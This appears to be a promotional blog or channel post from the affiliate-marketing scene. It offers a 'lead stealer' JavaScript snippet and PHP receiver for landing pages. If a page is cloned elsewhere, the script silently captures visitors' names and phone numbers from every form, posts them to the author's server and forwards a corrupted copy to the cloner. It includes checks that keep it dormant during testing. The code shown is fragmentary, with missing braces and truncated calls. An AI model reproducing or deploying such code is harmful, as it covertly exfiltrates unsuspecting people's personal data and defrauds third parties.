Lead Stealer Script to Protect Your Pre-Landing & Landing Pages!

Hello all! Today, I will share my solution with you. It’s a pre-landing/landing page script that steals leads if your landing/pre-landing page was copied.

You’re welcome to subscribe to the https://t.me/deepcpa channel!

What does it do?

  1. There are several verification procedures so that it only works when a real person logs in (it checks the protocol, port, referrer, visits count, and whether the domain is real or fake).
  2. You can adjust the % of stolen leads (from 1% to 100%).
  3. It won’t work on your domain.
  4. Processes all forms.
  5. It sends the victim, that is, the one who copied your landing/pre-landing page, the same lead, only with one digit replaced in the phone number.
  6. You’ll find comments to the script, so it’s easy to figure out.

It’s up to you to integrate it the way you want to.

Here’s the script. You must add it to the landing/pre-landing page, but make sure that you input the name and number with correct attributes: name=”name” and name=”phone”

// specify the % of script triggers here
const prc = 100
//specify the path to the php evaluator file
const url = 'evaluator URL here'
//specify the pre-landing/landing page domain
const originalHost = `your domain without https:// and /`
const checkedHost = window.location.host
const fullUrl = window.location.href
//run script
function start() {
    let userChek = checkUser()
    //check user verification
    if (!userChek) return
    let random = isRandom()
    //check whether the specified % is correct
    if (random) stealer()
function stealer() {
    //check if the landing page was stolen
    if (checkedHost == originalHost) return
    let forms = document.querySelectorAll('form')
    forms.forEach(element => {
        element.addEventListener('submit', (e) => {
            let name = e.target.querySelector('[name="name"]').value
            let phone = e.target.querySelector('[name="phone"]').value
            //generate the data to transfer
            let data = {
                host: fullUrl,
                name: name,
                phone: phone
            //send a request
                .then(res => {
                    //create a copy of the form and change the last digit, then send it
                    var dupForm = e.target.cloneNode(true);
                    dupForm.querySelector('[name="phone"]').value = `${phone.slice(0, -1)}${Math.floor(Math.random() * 9)}`
                    dupForm.style.display = 'none'
                    let body = document.querySelector('body')
function isRandom() {
    let rnd = Math.floor(Math.random() * 101)
    if (rnd <= prc) return true
    return false
function checkUser() {
    // the maximum visits count to trigger the script
    const AvalibleEntry = 2
    let protocol = window.location.protocol
    let port = window.location.port
    let host = window.location.host
    let reffer = document.referrer
    let status = false
    //check whether the user logged in from http or https
    if (protocol == 'http:' || protocol == 'https:') status = true
    if (!status) return false
    //check user’s port
    if (port != '') return false
    //check if it runs on server
    if (host.includes('localhost') || host.includes('')) return false
    //check referrer
    if (reffer == '') return false
    //determine the user visits count
    let userCount = localStorage.getItem('count')
    //restrict if more than two
    if (userCount >= AvalibleEntry) return false
    //if less, then determine the current value and add + 1
    userCount == null ? localStorage.setItem('count', 1) : localStorage.setItem('count', +userCount + 1)
    return true
function sendData(propse) {
    return fetch(url, {
        method: 'post',
        body: JSON.stringify(propse)
        .then(response => response.json())
        .then(json => (json))
        .then(res => {
            this.data = res
            return res


The evaluator script only receives data with the lead number, name, and host. Then, you can use it as you please: you can either send it to the AP or to the Telegram.


header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: GET, POST');
header("Access-Control-Allow-Headers: *");

$payload = file_get_contents('php://input');
$payload = json_decode($payload, true);

$phone = $payload['phone'];
$name = $payload['name'];
$url = $payload['host'];


Like it? Share with your friends!